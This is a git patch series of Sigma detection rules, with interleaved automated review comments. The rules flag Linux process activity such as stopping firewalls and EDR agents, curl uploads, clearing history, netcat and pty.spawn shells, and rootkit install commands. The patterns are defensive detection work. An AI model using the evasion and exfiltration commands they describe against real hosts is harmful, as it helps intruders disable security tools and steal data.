@@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities 
diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..130d9b5c8 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Servicess +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: experimental +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..a38c1ef16 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml 
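Review bot: `CommandLine|contains: 'stop'` / `'disable'` combined with `Image|endswith: '/systemctl'` or `'/service'` matches every routine service stop on the host (`systemctl stop nginx`, `service cron stop`), and as a substring match it also fires on any argument that merely contains those letters; at `level: medium` this will be noisy and it fully overlaps the targeted `proc_creation_lnx_security_tools_disabling.yml` rule re-indented just above, which already enumerates the services of interest. Either lower the level and state in the description that this is a broad hunting rule, or scope it with a second `CommandLine|contains` list of service names. For `/chkconfig` the disable verb is `off` (as `selection_carbonblack_2` above uses), so that image will rarely match with the current verbs. The title also has a typo: `Servicess` → `Services`.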
@@ -0,0 +1,38 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: experimental +description: Detects a suspicious curl process start the adds a file to a web request +author: Nasreddine Bencherchali +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + CommandLine|contains: + - ' -F ' + - ' --form ' + - ' --form-string ' + - ' -T ' + - ' --upload-file ' + - ' -d ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + condition: selection +falsepositives: + - Scripts created by developers and admins +level: medium +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..f38914616 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml 
@@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: experimental +description: Detects a suspicious curl process start on linux with set useragent options +author: Nasreddine Bencherchali +references: + - https://curl.se/docs/manpage.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 3727dee7e..1e893bf23 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml 
@@ -4,23 +4,30 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..ffddb3b60 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml 
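Review bot: The re-indented tag lines keep `attack.impact` / `attack.t1565.001` (Stored Data Manipulation), but deleting shell history files is Indicator Removal on Host: Clear Command History (T1070.003), and the reference added in this hunk (the T1552.003 atomic) documents reading history for credentials rather than deleting it, so tags and reference pull in different directions. Suggest `- attack.defense_evasion` / `- attack.t1070.003` and, if the T1552.003 link stays, a one-line comment on why it is relevant to a deletion rule. The added `'/unlink'` image and the `'.history'` / `'zhistory'` suffixes are reasonable extensions.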
@@ -4,23 +4,31 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml 
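Review bot: `attack.reconnaissance` / `attack.t1592.004` (Gather Victim Host Information: Client Configurations) is a pre-compromise technique, while reading `~/.bash_history` on a host is post-compromise credential access; the reference this hunk adds (the T1552.003 Unsecured Credentials: Bash History atomic) names the fitting technique. Suggest `- attack.credential_access` / `- attack.t1552.003` in the tags block. The same reconnaissance/T1592.004 tagging is carried over unchanged in `proc_creation_lnx_cat_sudoers.yml` earlier in this patch, where a discovery technique would arguably fit better.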
@@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth 
@@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 
--- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml 
@@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml 
@@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 From 7a5017696fddafaa68eed8cc07b09e6e2fb90a69 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:23:15 +0200 Subject: [PATCH 34/96] Add more flag to curl windows rule --- .../proc_creation_win_susp_curl_fileupload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 20ffcba7a..44c6f4373 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -9,7 +9,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html date: 2020/07/03 -modified: 2022/01/22 +modified: 2022/09/15 logsource: category: process_creation product: windows 
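Review bot: The new rule's file is named `prox_creation_lnx_chattr_immutable_removal.yml` (see the `+++` header above this hunk), while every sibling in `rules/linux/process_creation/` uses the `proc_creation_` prefix; rename it to `proc_creation_lnx_chattr_immutable_removal.yml` so tooling and reviewers that key on the prefix treat it like the rest. `CommandLine|contains: ' -i '` only fires when `i` stands alone in its flag group, so a combined form such as ` -ia ` is not covered; if that narrowing is intended, record it in the description, otherwise a prefix match like `' -i'` together with a matching false-positive note widens it. The false-positive entry doubles its example marker — `Administrator interacting with immutable files (e.g. backups).` reads cleaner.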
@@ -21,10 +21,12 @@ detection: CommandLine|contains: - ' -F ' - ' --form ' + - ' --form-string ' - ' -T ' - ' --upload-file ' - ' -d ' - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" condition: all of selection* fields: - CommandLine From 33271e9034c648f98f3dd1313c2fc9d0f07effdf Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:29:45 +0200 Subject: [PATCH 35/96] Quick update --- .../proc_creation_lnx_susp_history_delete.yml | 1 + .../proc_creation_macos_clear_system_logs.yml | 7 +++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 1e893bf23..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -16,6 +16,7 @@ detection: Image|endswith: - '/rm' - '/unlink' + - '/shred' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: 
@@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: From 5dfa871cefa52c8e74b5b9acca99d9e117ce05c9 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:38:00 +0200 Subject: [PATCH 36/96] Update proc_creation_lnx_base64_shebang_cli.yml --- .../process_creation/proc_creation_lnx_base64_shebang_cli.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml index 73ac17665..a58e96eb9 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -12,7 +12,7 @@ logsource: category: process_creation detection: selection: - - CommandLine|contains: + CommandLine|contains: - "IyEvYmluL2Jhc2" #!/bin/bash" - "IyEvYmluL2Rhc2" #!/bin/dash" - "IyEvYmluL3pza" #!/bin/zsh" From c2256845b2e67837b4f71d2cc47a4efc256fca34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:45:56 +0200 Subject: [PATCH 37/96] refactor: renamed and changed title --- ...ation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} (95%) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml similarity index 95% rename from rules/windows/process_creation/proc_creation_disable_SEP.yml rename to rules/windows/process_creation/proc_creation_win_taskkill_sep.yml index abe183491..92f6ddbbe 100644 
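Review bot: The inline comments on the three base64 entries of proc_creation_lnx_base64_shebang_cli.yml carry an unbalanced trailing quote (`#!/bin/bash"`, `#!/bin/dash"`, `#!/bin/zsh"`), which reads as a typo; write them as `# "#!/bin/bash"` or simply `# #!/bin/bash`. The structural fix itself — dropping the leading `-` so `selection` is a mapping rather than a one-element list — is correct and is what makes the `CommandLine|contains` list apply to the selection. The encoded-prefix list may continue past the end of the hunk, so any further entries are not visible here.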
--- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,4 +1,4 @@ -title: Disabling Symantec Endpoint Protection with Taskkill +title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. From 7f3158d09e24d7b3edd9332e5ef81d253de0c7c2 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 11:47:19 +0200 Subject: [PATCH 38/96] Fix after review --- .../linux/process_creation/proc_creation_lnx_cat_sudoers.yml | 1 + .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +- .../process_creation/proc_creation_lnx_local_account.yml | 1 + .../process_creation/proc_creation_lnx_local_groups.yml | 1 + .../proc_creation_lnx_susp_curl_fileupload.yml | 5 ++--- .../proc_creation_lnx_susp_history_recon.yml | 1 + .../proc_creation_win_susp_curl_fileupload.yml | 3 +-- 7 files changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 5f7b9d5e7..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -17,6 +17,7 @@ detection: - 'grep' - '/head' - '/tail' + - '/more' CommandLine|contains: ' /etc/sudoers' condition: selection falsepositives: 
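Review bot: `'/more'` is added to the reader list of proc_creation_lnx_cat_sudoers.yml while its companion pager `'/less'` is not visible in the hunk; unless it already sits above the hunk, add `- '/less'` next to it. The identical additions in proc_creation_lnx_local_account.yml, proc_creation_lnx_local_groups.yml and proc_creation_lnx_susp_history_recon.yml in this commit have the same gap and should be changed together. The `Image|endswith` list begins before the hunk, so the full set of entries cannot be confirmed from here.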
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml index 730ba33df..580eece01 100644 --- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -11,7 +11,7 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' condition: selection falsepositives: - Scripts created by developers and admins diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index 058e10b0e..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -20,6 +20,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' - '/etc/shadow' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index ba0b9cad7..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -18,6 +18,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml index a38c1ef16..c47d62511 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml 
@@ -18,11 +18,10 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index ffddb3b60..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -17,6 +17,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 44c6f4373..f8ae829c9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -20,8 +20,7 @@ detection: selection_cli: CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' From 9d5652c4c2d406440837fb6e0cd98cf76c4879ff Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:43:01 +0200 Subject: [PATCH 39/96] Update proc_creation_lnx_services_stop_and_disable.yml --- .../proc_creation_lnx_services_stop_and_disable.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml index 130d9b5c8..7b1778780 100644 --- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml 
+++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
@@ -1,4 +1,4 @@
-title: Disable Or Stop Servicess
+title: Disable Or Stop Services
id: de25eeb8-3655-4643-ac3a-b662d3f26b6b
status: experimental
description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
From 914aa4ee3153185b400e72d0107ce2c5ffbd307c Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:58:52 +0200 Subject: [PATCH 40/96] chore: add more checks
---
tests/check-baseline-local.sh | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+)
diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh
index 4c3929b90..3c849f52d 100755
--- a/tests/check-baseline-local.sh
+++ b/tests/check-baseline-local.sh
@@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then
exit 1
fi
+if [[ -z $(command -v xargs) ]]; then
+ >2& echo "xargs not found. Please install findutils."
+ >2& echo "Exiting"
+ exit 1
+fi
+
+if [[ -z $(command -v tar) ]]; then
+ >2& echo "tar not found. Please install."
+ >2& echo "Exiting"
+ exit 1
+fi
+
+if [[ -z $(command -v mktemp) ]]; then
+ >2& echo "mktemp not found. Please install coreutils."
+ >2& echo "Exiting"
+ exit 1
+fi
+

if [[ -z $(command -v realpath) ]]; then
>2& echo "realpath not found. Please install coreutils."
>2& echo "Exiting"
From 68a80844ea911f6ddd0ba0f77fc964f6713bdda9 Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 15 Sep 2022 13:14:37 +0200 Subject: [PATCH 41/96] fix: new FPs in testing environment
---
.../image_load/image_load_susp_dbghelp_dbgcore_load.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml
